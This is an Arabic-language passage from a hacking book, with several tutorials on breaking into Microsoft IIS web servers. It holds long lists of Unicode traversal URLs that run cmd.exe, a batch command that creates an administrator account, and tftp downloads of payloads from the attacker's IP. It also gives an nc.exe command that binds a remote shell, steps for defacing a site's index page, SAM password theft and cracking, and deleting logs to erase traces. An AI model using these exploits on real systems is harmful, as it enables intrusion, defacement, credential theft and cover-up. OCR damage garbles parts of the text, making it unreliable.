الى اي خدمه مثل تلنت او اف تي بي ؟؟IWAM_USERسؤال : هل تستطيع الدخول بهذا اليوزر ؟ الجابة : ل .. صحيح اننا قمنا برفع امتيزاته لكننا ل نملك كلمه المرور ! لنه تكون مسنده بشكل عشوائي .

سيذهب تفكير البعض الى الحصول على ملف السام وكسره :) هذا ممكن .. لكن يوجد ماهو اسهل . ولكننا ل نملك كلمة المرور . ما رأيك بإضافه يوزر جديدAdministratorبما اننا لدينا حساب مكافي لـ

باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! :) قليل من الذكاء والتفكير :) قم بانشاء مستند نصي جديد واضف السطر التالي :

net user Demon pass /add && net localgroup administrators Demon /add .add.bat واحفظها باسم Save asوالن

Pass وكلمة مرور Demonتوضيح : ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد واضافته الى مجموعة الدمنستريتورز :) المدراء ..

ثم تشغيلها من المتصفح (بواسطة اليونكود) add.batقم الن برفع الملف الن لديك حساب مدير :) وتستطيع الدخول الى اي خدمه .. اف تي بي او تلنت او نت بيوس او غيرها :) ل تنسى في النهاية مسح الثار واضافة البواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه :)

طبعا لن اتوسع في هذا الجانب لنه ( لكل شيخ طريقة!) وكل واحد له اسلوب في اخفاء ادواته والتحكم فيالملفات .

نرجع لنقطة سابقة ..هل تذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟

من خلل سطر اوامر الن سي .. فانك ستجد من المنافذ ما يسرnetstat -anلو جربت تنفذ المر القلب :)

فيها مفتوحا بدون حمايه139 من السيرفرات اللي دخلتها وكانت محمية بجدران نار :) وجدت المنفذ 90%

128

Page 129: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

(:لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار لسقاط الهدف :)

اسف على النحو الملء .. والتنسيق الـ أي كلم :) واختصار المعلومات ايضا .

.GUIبالمكان الستعراض اكثر من ذلك بكثير .. الى درجة الحصول على تحكم رسومي

لكن لم يكون لدي الوقت الكافي .. اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثلGEtAdmin و Sechole2 وكيفية الحصول على تحكم رسومي بواسطه الداة WINvnc..

انتهى،،،

معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود ""

129

Page 130: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة><ةةةةةة: ةةةة ةةةة>

الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلباتالدوات المطلوبه :

) اداة مسح ثغرات يونيكود 1TFTPD) برنامج سيرفر 2) معرفة جيده باليونيكود3

==================================================================================================

) بأمكانك الحصول على ثغرات اليونيكود من العديد من المواقع او من موقعي1http://www.devil2k.com/

وهذه مهداه مني انا (( بلك هنتر ))/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c\:/msadc/..

%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c\:

/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/c

md.exe?/c+dir+c\:/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c\:/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c\:/msadc/..%%35c../..%%35c../..%

%35c../winnt/system32/cmd.exe?/c+dir+c\:/msadc/..%%35%63../..%%35%63../..%

%35%63../winnt/system32/cmd.exe?/c+dir+c\:/msadc/..

%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c\:

/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c\:

/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c\:

/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/c

md.exe?/c+dir+c\:_/vti_bin/..%255c..%255c..%255c..%255c..

%255c../winnt/system32/cmd.exe?/c+dir+c\:_/vti_bin/..%%35c..%%35c..%%35c..%%35c..%

%35c../winnt/system32/cmd.exe?/c+dir+c\:_/vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%

%35%63../winnt/system32/cmd.exe?/c+dir+c\:

130

Page 131: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

_/vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi

nnt/system32/cmd.exe?/c+dir+c\:/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c\:/PBServer/..%%35%63..%%35%63..%

%35%63winnt/system32/cmd.exe?/c+dir+c\:/PBServer/..

%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c\:

/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c\:/Rpc/..%%35%63..%%35%63..%

%35%63winnt/system32/cmd.exe?/c+dir+c\:/Rpc/..

%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c\:_/vti_bin/..%255c..%255c..%255c..%255c..

%255c../winnt/system32/cmd.exe?/c+dir+c\:_/vti_bin/..%%35c..%%35c..%%35c..%%35c..%

%35c../winnt/system32/cmd.exe?/c+dir+c\:_/vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%

%35%63../winnt/system32/cmd.exe?/c+dir+c\:_/vti_bin/..

%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c\:

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c\:

_/vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:

/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c\:

/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c\:

/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c\:

/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c\:/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c\:

131

Page 132: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c\:/msadc/..%c0%af../..%c0%af../..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:_/vti_bin/..%c0%af../..%c0%af../..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c\:/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c\:/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c\:/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\

%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c\:/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:/samples/..%c0%af..%c0%af..%c0%af..%c0%af..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:_/vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:_/vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:

من الموقعTFTPD) بأمكانك الحصول على برنامج 2http://iisbughelp.4t.com/

) معرفة اليونيكود بسيطه جدا يكفي ان تعرف كيف تستطيع النتقال عبر الهارديسكات وعبر الملفات3(تعمل عبر المتصفح )

]/scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C\:

Cلقرائه ما بداخل هارديسك \:]/scripts]/..%c0%af../..%c0%af../..

%c0%af../winnt/system32/cmd.exe?/c+dir+D\:Dلقرائه ما بداخل هارديسك \:

]/scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+E\:

Eلقرائه ما بداخل هارديسك \:

132

Page 133: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

نقوم بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب (( اغلبثغرات اليونيكود تنطلق من هذه المجلدات ))

msadc)مثال المجلد 1/msadc/..%c0%af../..%c0%af../..

%c0%af../winnt/system32/cmd.exe?/c+dir+C\:vti_bin) مثال المجلد _2_/vti_bin/..%c0%af../..%c0%af../..

%c0%af../winnt/system32/cmd.exe?/c+dir+C\: عند تركيبها (( بشكل عادي )) يكون المجلد الرئيسي للويب تحت اسم معين وهو :IISفي سيرفرات

C:\Inetpub\wwwrootاو في المجلد

D:\Inetpub\wwwroo t او في المجلد

E:\Inetpub\wwwroot ولذلك سأكمل شرحي على انه هناكCفي العاده يكون في الهارديسك

ستجد في هذا المجلد عادة جميع المواقع التي على السيرفر

فلو وجدنا ثغرة يونيكود ما ولتكن/msadc/..%c0%af../..%c0%af../..

%c0%af../winnt/system32/cmd.exe?/c+dir+c\:وأردنا الولوج الى هذا الملف لنرى ما به فسنكتب الثغره هكذا :

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot

اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ( ستجدها في مجلدات بداخل مجلد الـwwwrootاما لو كان السيرفر عباره (

نفسهwwwrootعن موقع واحد فقط فستجد كافة الملفات في مجلد الـ في اغلب الظن يقوم الهاكر بتغيير الصفحة الرئيسيه الولى وعليك ان تعلم انه ليس دائما الصفحة الرئيسيه

index.htmالولى تحمل اسم هناك عدة تسميات وأختصارات لها وهذه بعضها (( معظمها ))

index.htmindex.asp

default.htmdefault.asp

main.htmmain.asp

فكيفindex.htm هي wwwrootلنفرض الن اننا وجدنا ان الصفحة الرئيسيه للموقع في مجلدنا سنقوم بتغييرها وهو ما يهمنا تقريبا من عملية

الختراق هذه

ss.htm الى اي اسم اخر يخطر ببالك وليكن index.htmسنقوم اول بتغيير اسم الملف من c+ren الى الداله c+dirطبعا سنرسل المر عبر ثغرة اليونيكود من المتصفح لديك وسنقوم بتغيير الداله

Command وفي Dos(( عليك ان تعرف ان الوامر التي سوتضع هي نفس الوامر الموجوده في Promptفعليك ان تكون عارفا بما هو المر المراد استخدامه

المهم ستكتب الثغره هكذا :

133

Page 134: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.ht

m+ss.htm

ss.htm الى index.htmوهكذا فقد تم تغيير اسم الصفحة من ارأيتم كم هو سهل :) ؟

Aيبدو انك ايها المخترق لم تكتفي باغلق الصفحة الرئيسيه للموقع فانت تريد ان تضع صفحة بموضوع اخر وليكن الموضوع هو

Hacked!!! ؟؟index.htmفكيف سنرسلها في صفحة

الذي ستكون فيه انت في وضعTFTPهناك عدة طرق ومنها سأذكر هذه الطريقه وهي عبر التصال بمنفذ السيرفر والموقع الذي امامك

في وضع الكلينت

كيف سيتم هذا ؟

على جهازك ( البرنامج المذكور في اول الموضوع من افضل البرامجTFTPاول قم بتركيب نظام سيرفر وهناك برنامج اخر اكثر احترافا ولكن هذا يكفي )

لديكCالن ضع السيرفر الرئيسي في \:C وضعها في \:index.htmقم بتصميم صفحة خفيفه وسريعه وسمها

لدينا الى ملفCالن نريد ان نرسل للسيرفر الملف الجديد من \:

C:\inetpub\wwwroot TFTPل ليس المر صعبا ففي نظم ميكروسوفت يوجد امر (( هو بالصح برنامجا منفصل )) يحمل اسم

وهو عباره عن كلينت بسيط يستخدم وهو بروتوكول بسيط جدا جدا (( يسميه البعض البروتوكول التافه )) يقوم بسحب اوTFTPبروتوكول

ارسال الملفات من والى الجهازنحن نريد ان يسحب ملفا من جهازنا فكيف لنا ذلك ؟

طبعا لو كنا في غير اليونيكود لكتبنا توليفة المر التالي :tftp.exe -i XXX.XXX.XXX.XXX get index.htm

C:\inetpub\wwwroot\index.htm ))XXX.XXX.XXX.XXX(( تعني اي بي السيرفر المراد سحب الملف منه

ليضعه في جهازه في المجلدindex.htmفي توليفة هذا المر يقوم الكلينت بطلب الملف المسمى wwwroot

ولكن ل تنسى فشكل توليفة الوامر يختلف من الوضع العادي عن وضع اليونيكودفما هو الحل ؟

الحل هو ان تحول توليفة المر الى يونيكود لتضعه في الثغره التي لديكبعد تحويل المر الى يونيكود سيصبح شكله كالتالي :

tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm

ياللروعه لقد تجاوزنا العقبه بالفعل :)

index.htm وقم بتجهيز ملف الـ TFTPالن قم بتشغيل سيرفر الـ وقم بالتصال مع الموقع عبر ثغرة اليونيكود المضاف اليها هذه التوليفه ليصبح في النهايه على هذا النحو :

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-

i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm

وهكذا قمنا بتحميل الصفحة الى النترنت وانتيهنا من عملية الختراق (( تقريبا :) )) ايضا وتشغيلها على السيرفر بنفس السلوب وهذا مثال :EXEملحوظه : يمكنك ان تقوم بتحميل ملفات

134

Page 135: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ونريد تشغيله فكيف لنا ذلك ؟hunter.exe على السيرفر وسميناه EXEلنفرض اننا نريد تحميل ملف سنتبع التي :

للسيرفر عبر هذه التوليفهC ونضعه في \:index.htmنقوم بتحميل الملف على السيرفر كما قمنا بتحميل :/msadc/..%c1%9c../..%c1%9c../..

%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe

بعد ان يتم تحميل الملف سنشغله عبر تنفيذ هذا المر

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exeاو عن طريق هذا المر

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe

.*logالن وقد قاربنا على النتهاء بقي لدينا في السيرفر عمل واحد فقط ال وهو مسح ملفات اللوج

وسيكون ذلك عن طريق هذا المر :/msadc/..%c0%af../..%c0%af../..

%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s

هناك انواع اخرى من الملفات يتم تخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذاتtmpالمتداد

وهذا امر مسحها عبر اليونيكود :/msadc/..%c0%af../..%c0%af../..

%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s ايضا ملحوظه مهمه وهي ان ل تبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او

ايميلتهم الحقيقيه قم بمسح اي شيء يدل عليكاو على عملية الختراق (( حاول ان تصل الى هذا المستوى ))

حتى تتمكن منbatهناك عدد من الشياء والفكار لن اتطرق اليها مثل ارسال فايروس ما او امر على ملف وضع مشكله كبيره في السيرفر لكي ل يعمل

او ان ترسل فايروس يقوم بمحو جميع ملفات النظام او ان تمرز نفسك لديهم في السيرفر عن طريق برامجالتحكم عن بعد و اخفائها بشكل جيد

)) والكثير الكثيرsystem32في المجلدات ذات الملفات الكثير (( مثل

________________________________________________________________________________

ملحوظات : لن تعمل هذه الثغره في كل الحالت فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن من سيرفراتهمtftpطريق مسح ملف

)) وبعض السيرفرات قامت بعملية الترقيعsystem32(( الملف المسؤول عن ذلك موجود في المجلد (( اصدرت ميكروسوفت ترقيعا لهذه الثغره ))

وبعضهم قد يكون واضع فاير وول يقوم بمراقبة الباكيج الصادر والوارد وقد يقوم بعمل اصطياد لمثل هذهالعمليات

Eeye من شركة Secure IIS ال وهو IISواخرون يقومون بتركيب برنامج الحمايه القوي جدا في نظم %90والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع (( قبل حوالي اربعة اشهر )) كان ما يقارب

IISمن السيرفرات التي فيها نظام تحوي هذه الثغره وبدون ترقيع (( لعدم وجوده وقتها )) او لهمال المدير.

انتهى،،،

135

Page 136: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"IISالدليل الكامل لختراق سيرفر "

<ةةةةة ةة ةةةةةةة ةةةة ةةةةة>

>DEMON <ةةةةةة:

---------مقدمة : - ---------

حيث تشكل النسبة الكبر المستخدمة في تشغيل مواقع النترنت .. IISيعلم الجميع مدى انتشار سيرفرات ويعلم الجميع مدى ضعف الناحية المنية لهذه السيرفرات .. لذا قررت القيام بجمع اشهر ثغرات هذا النوع مع

توضيح كيفية عملها .

---------ملحظة : -

--------- ((يعني80 وجميعها تعتمد على البورت IIS5.0 و IIS4.0معظم الطرق الموجودة هنا تعمل على سيرفرات

من خلل المتصفح)) .

-------------المتطلبات : - -------------

1 -CGI-Scanner جيد .. أنا افضل Whisker: يمكنك تنزيله من هذا الموقع) www.wiretrip.net/rfp (

- اكتيف بيرل لتشغيل ملفات البيرل ( يمكنك تنزيله من الموقع :2http://www.activestate.com/ (

.. IIS- ويب سيرفر (اي نوع) اباتشي او 3

##################################################

#########################

########### !#Game Starts #

###########

----------------

136

Page 137: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

IIS Hack.exe - : ----------------

وجعلها تنصتnc.exe ثغرة امنية تسمح لك بتحميل نسخه ذكية من eEyeاكتشف خبراء المن في شركة .. 80على المنفذ

. Administrator مع امتيازات cmde.exeوهذا سيعطيك سطر اوامر . /http://www.technotronic.com من الموقع IIS Hack.exe و NC.exeبامكانك انزال

ويجب تشغيل ويب سيرفر في جهازك قبل تنفيذ الثغرة .. IIS) وفي Htdocs وضعها في الدليل الرئيسي للويب سيرفر لديك (في اباتشي nc.exeقم بنسخ اداة

. wwwrootالدليل : IISHack.exeثم قم بتشغيل

c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe وبعد اتمام الخطوة السابقة بنجاح :

c:\>nc http://www.target.com/ وستجد امامك eGG SheLL

فقط ((اذا لم يتم تركيب الرقعه)) . IIS4.0ملحظة : تعمل هذه الثغرة على سيرفرات

do you want me to explain what to do next, hey common you must be kidding

...hehe ....

-----------------MDAC = RDS -: -----------------

% من المواقع تعاني منها .. 40اعتقد انها ثغرة قديمة قليل (لكني ما زلت ارى ان تسمح لك هذه الثغرة بتشغيل اوامرك على النظام الهدف بشكل محلي .. سيتم تشغيل وامرك بصفتك مستخدم

SYSTEMاي بصلحيات مدير النظام .. على العموم اذا اردت معرفة اذا ما كان النظام مصابا بهذه الثغرة ام ل ..

ثم قم بارسالc:\>nc -nw -w 2 http://www.host.com/ 80قم اول بالتصال بالنظام الهدف : GET /msadc/msadcs.dll HTTPالمر :

فهذا يعني ان النظام مصاب (( اذا لم يتم ترقيعه )) .. application/x_vargفإذا كان الرد : www.wiretrip.net/rfpبامكانك ايجاد سكربتات بيرل تسهل عليك العمل في هذا الموقع :

(( mdac.pl - msadc2.pl )) v c:\> mdac.pl -h host.com

Please type the NT commandline you want to run (cmd /c assumed):\n cmd /c

< echo hacked by me heheإذا اردت تغيير الصفحه الرئيسية ما عليك ال تنفيذ المر : C:\inetpub\wwwroot\index.htm

اقصدHacker's Swiss knife Armyوإذا أردنا احكام السيطرة على الموقع بامكاننا تحميل Nc.exe : بواسطة هذا المر

%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe

(( قم بقراءة المر من اليسار الى اليمين لتتمكن من قراءته جيدا )) . Administrator وستجد سطر اوامر مع امتيازات 80بعدها قم بالتصال بالنظام الهدف على المنفذ

--------------------------------------Codebrws.asp & Showcode.asp -:

-------------------------------------- ولكنه ل يأتي محمل افتراضيا بل يجب على مدير النظامIIS يأتي مع ASPالملفان عبارة عن قاريء ملفات

137

Page 138: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

تفعيله .. ((اعني رؤيةaspفإذا كانت هذه الخدمة مفعلة ستسفيد منها كثيرا قهي تسمح لك بقراءة اي ملف .

المصدر)) . باستخدام هذا المر ستحصل على ملف السام (( اذا كان النظام مصابا )) :

http://www.victim.com/msadc/samples...nt/repair/sam_. (سيتمLC3.0 .. باستخدام الداة المفضلة لدي Expand it & Crack itبعد الحصول على ملف السام

ساعه ) . 24كسرها في اقل من

--------------Null.htw - :

------------عملية شرح كيفية عمل هذه الثغرة معقد قليل .. لذا سأكتفي فقط بطريقة الستفادة منها ..

.. ASPباختصار تسمح لك برؤية السورس كود لي ملف http://www.victim.com/null.htw?CiWe...HiliteType=fullلتنفيذ الثغرة :

. Default.aspسيعرض لك هذا الرابط السورس كود الخاص بالصفحه

----------------------webhits.dll & .htw - :

---------------------- http://www.victim.com/blabla.htwاول قم بتجربة اللنك على النظام الهدف :

فهذا يعني ان النظامformat of the QUERY_STRING is invalidفإذا كان الرد بهذه العبارة : % . 90الهدف مصاب بنسبة

اخيرا جرب تنفيذ الثغرة بهذه الطريقة : www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full

باحد هذه الملحقات , وبالتأكيد سيعمل احدها : XXXXX/XXXXX/XXXX/XXX.htwمع تغيير الـ iissamples/issamples/oop/qfullhit.htw

iissamples/issamples/oop/qsumrhit.htw isssamples/exair/search/qfullhit.htw

isssamples/exair/search/qsumrhit.htw .. LC3وبالتالي ستحصل على ملف السام قم بكسره بواسطه الداة

------------------------------------------------]ASP Alternate Data Streams [::$DATA -:

------------------------------------------------ والن تعمل علىIIS3.0 .. وهي مخصصة بالتحديد لسيرفرات 1998هذه الثغرة كانت بدايتها منذ العام

.. IIS4.0بعض سيرفرات ومهمتها عرض السورس كود لي صفحه (( البعض يتساءل مالفائدة من عرض سورس الصفحه ؟؟ ))

Global.asaالجابة ان بعض الصفحات تحتوي على معلومات مهمة مثل كلمات مرور قواعد البيانات مثل

::http://www.victim.com/default.aspيمكن تنفيذ الثغرة من المتصفح بواسطة هذا المر $DATA

------------------ASP dot bug - : ------------------

ربما اقدم ثغرة في هذا النص هي هذه الثغرة حيث تقوم ايضا بعرض السورس كود الخاص بأي صفحه ..

138

Page 139: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

.. 1997حيث تم اكتشافها في العام ويتم تنفيذها من المتصفح بهذا الشكل :

.http://www.victim.com/sample.asp لحظ النقطة الموجودة في اخر السطر . IIS3.0وهي فقط تعمل على سيرفرات

------------------------------------ISM.DLL Buffer Truncation - : ------------------------------------

خطأ برمجي يسمح للمهاجم بسحب الملفات ورؤوية السورس كود ايضا .. وفكرة الثغرة هي التحايل على السيرفر بإيهامه اننا قمنا يطلب ملف ما .. وفي الحقيقة نحن نقوم بطلب ملف

اخر .. )20 حيث يتم تحميله بعدد كبير من الرموز المسافة (%ISM.dllالملف المسؤوول عن هذا الخطأ هو

Space . يمكن تنفيذ الثغرة بهذا الشكل :

http://www.victim.com/global.asa%20(...<=230)global.asa.htr % .. 20 مسافة بهذا الشكل 230=> نقوم بوضع 230مكان الـ

.. ولكن ل يمكن تجربتها على السيرفر اكثر من مره ال اذاIIS 4.0&5.0هذا الخطأ يعمل على سيرفرات قام بتسجيل خروج وتسجيل دخول , ويعود السبب في ذلك ان الثغرة السابقة تؤدي الى ايقاف الملف

ISM.dllعن العمل في الذاكرة بينما تطلب الثغرة ان يكون الملف المذكور قيد العمل .. لذا يجب اعادة تحميل الملف في الذاكرة مره اخرى .. اي بمعنى اخر يجب ان يقوم مدير النظام الهدف بعمل اعادة تشغيل

Rebot او Logout & Login .

----------.+htr -:

--------- . ASPهذه الثغرة ايضا تقوم بعرض السورس الخاص بملفات

يمكن استخدامها بهذا الشكل : http://www.victim.com/global.asa+.htr

-------------site.csc - :

------------ DSN, UID and الخاص بالموقع بما في ذلك DNSتمكنك هذه الثغرة من معرفة معلومات مهمة عن الـ

PASS Database .. http://www.victim.com/adsamples/config/site.cscالثغرة :

سيقوم المهاجم بانزال الملف المذكور .. وسيحصل على معلومات قيمة و هامة أيضا .

انتهى،،،

139

Page 140: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"UniCode"دراسة مفصلة وبعمق في الـ

<ةةةةة ةة ةةةةة ةةةةة>

>Dark Devil<ةةةةةة:

السلم عليكم ورحمه ال و بركاته ::ازيكم شباب ايه اخباركم كلكم ؟ اتمنى تكونوا بخيرو.

اعذرونى على غيبتى و انقطاعى عنكم و لكن و ال ظروف رهيبه و الن خلونا نرغى فى شويه كلم فاضى على رأى بروكن

كنت اتصفح النترنت و ادعبث شوى و بعدين جمعت بعض من المعلومات من ملفات مختلفه و هى تتحدث عن اليونى كود (طبعا الن معظمكم سيستعجل و يقول ياه ه ه ه ه يونى كود قديمه ....الخ ) و لكن انا اقوله اصبر لقد ذكرت اليونى كود فى المنتديات ثلث مرات مره عن الصديق بلك هنتر و مره من الخ هكس و

مره عن الصديق ديمون او ابو خلود لكن هذه المره صدقونى ستكون مختلفه تمام الختلف عن المرات )Trust Meالسابقه (

و الن دعونا من ها الخرابيط و خلونا نقول الدرس يمكن يعجبكم::

اول:====

متى وجدت اليونى كود؟Found On 15 May 2001 BY NSFOCUS

السيستيمز التى تتأثر بالثغره هى ::All running IIS 4 / IIS 5 web server

Windows 2kWindows 2k SP1 + SP2

ثغره اليونى كود ::هى عباره عن ثغره تسمح للهاكر بأن يشغل اوامر بالقوه بصلحيه مسموح بها (اى يكون )IUSR_machinename accountله امتياز

الموجود على الويب سرفر نفسه يفك شفره عنوان الموقعcgiو تحدث هذه الثغره اصل نتيجه ان روتين ال (ل تقلق ستفهم بعد ذلك )DeCodeمرتين و هذا ما نسميه بال

تعالى معى خلينى اوضحلك ايه الخرابيط الى انا كاتبها فوق دى

و ليكن مثل ::http://iisserver/scripts/..%5c..%...md.exe?/c+dir+cثغره يونى كود <===

http://iisserver/سيكون هذا هو هدفنا اى الموقع المصاب بالثغره المذكروه <====

/ *scriptsو هذا الفولدر لديه امتيازات تنفيذيه على السرفر (اى يمكن لليوزر تنفيذ اى امر على الوب - / الموجوده على الوب سرفر وcgiسرفر من خلله ) وهذا الفولدر ايضا هو المستخدم فى تنفيذ سكربتس ال

140

Page 141: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

)executable directoryبالتحديد هذا الفولدر يسمى الفولدر التنفيذى اى

وiisو طبعا هذا الفولدر ليس له اسم ثابت هذا فقط مثال و لكن يمكن ان يكون له اسماء كثيره على الملقم executable directory هذا الفولدرالتنفيذى اى iisملحوظه هامه:: ل يوجد على كل ملقم

و اعتقد ان الصديق بلك هنتر و الخ هكس قد ذكرو معظم اسامى هذه الديريكتورز فى شرحهم (فأنا اريد اناربط الدروس مع بعض حتى تكون سلسله متكامله )

*winnt/system32/cmd.exe و طبعا هذا هو ال <=== cmdالذى يسمح لنا بأدراج سطور وping فى استخدام اوامر مثل cmdالوامر التى نريد تنفيذها (و على فكره ممكن تستعمل هذا ال

netstat و traceroute( الخ اعتقد انها فكره لم يلحظها بعضنا....

